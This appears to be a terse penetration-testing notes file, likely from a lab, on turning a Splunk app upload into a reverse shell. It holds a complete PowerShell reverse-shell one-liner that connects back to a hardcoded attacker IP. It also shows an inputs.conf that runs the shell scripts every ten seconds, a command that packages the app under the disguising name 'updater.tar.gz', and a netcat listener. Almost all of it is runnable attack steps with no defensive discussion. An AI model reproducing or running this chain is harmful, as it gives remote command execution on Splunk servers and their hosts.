******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
******************************************************************************************************************************************** SPLUNK **********************************************************************************************************************************************************************************************************************************************
******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
https://github.com/0xjpuff/reverse_shell_splunk/tree/master
******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
kali$ tree splunk_shell/

splunk_shell/
├── bin
└── default
******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
#A simple and small reverse shell. Options and help removed to save space. 
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
kali$ cat inputs.conf 

[script://./bin/rev.py]
disabled = 0  
interval = 10  
sourcetype = shell 

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
kali$ tar -cvzf updater.tar.gz splunk_shell/

splunk_shell/
splunk_shell/bin/
splunk_shell/bin/rev.py
splunk_shell/bin/run.bat
splunk_shell/bin/run.ps1
splunk_shell/default/
splunk_shell/default/inputs.conf
******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
$ sudo nc -lnvp 443
******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
upload the tar file. The listener gets triggered.
******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
